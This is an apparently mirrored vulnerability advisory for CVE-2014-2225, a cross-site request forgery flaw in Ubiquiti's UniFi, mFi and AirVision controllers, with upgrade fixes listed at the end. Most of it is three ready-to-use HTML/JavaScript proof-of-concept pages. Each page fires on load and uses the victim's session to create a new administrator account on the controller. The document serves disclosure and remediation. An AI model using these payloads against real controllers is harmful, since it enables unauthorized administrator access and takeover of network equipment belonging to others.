# Vendor Homepage: (http://www.ubnt.com/) # Tested on: Kali Linux ----------------------------------------- Affected Products/Versions: ----------------------------------------- UniFi Controller v2.4.6 mFi Controller v2.0.15 AirVision Controller v2.1.3 Note: Previous versions may be affected ----------------- Description: ----------------- Title: Cross-site Request Forgery (CSRF) CVE: CVE-2014-2225 CWE: http://cwe.mitre.org/data/definitions/352.html Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html Researcher: Seth Art - @sethsec --------------- UniFi POC: --------------- <html> <head> <script> function sendCSRF() { var url_base = "https://192.168.0.106:8443/api/add/admin" var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D" var xmlhttp; xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", url_base, true); xmlhttp.setRequestHeader("Accept","*/*"); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=UTF-8"); xmlhttp.withCredentials= "true"; xmlhttp.send(post_data); } </script> </head> <body> <h1>CSRF POC</h1> Sending CSRF Payload!!! <body onload="sendCSRF()"> </body> ------------- mFi POC: ------------- <html> <head> <script> function sendCSRF() { var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin" var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D" var xmlhttp; xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", url_base, true); xmlhttp.setRequestHeader("Accept","*/*"); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=UTF-8"); xmlhttp.withCredentials= "true"; xmlhttp.send(post_data); } </script> </head> <body> <h1>CSRF POC</h1> Sending CSRF Payload!!! <body onload="sendCSRF()"> </body> -------------------- AirVision POC: -------------------- <html> <head> <script> function sendCSRF() { var url_base = "https://192.168.0.106:7443/api/v2.0/admin" var post_data="{\”name\”:\”csrf\”,\”email\”:\”csrf@gmail.com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}” var xmlhttp; xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", url_base, true); xmlhttp.setRequestHeader("Accept","*/*"); xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8"); xmlhttp.withCredentials= "true"; xmlhttp.send(post_data); } </script> </head> <body> <h1>CSRF POC</h1> Sending CSRF Payload!!! <body onload="sendCSRF()"> </body> ------------- Solution: ------------- UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater mFi Controller - Upgrade to mFi Controller v2.0.24 or greater AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note: The application name changed from AirVision to UniFi Video)
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论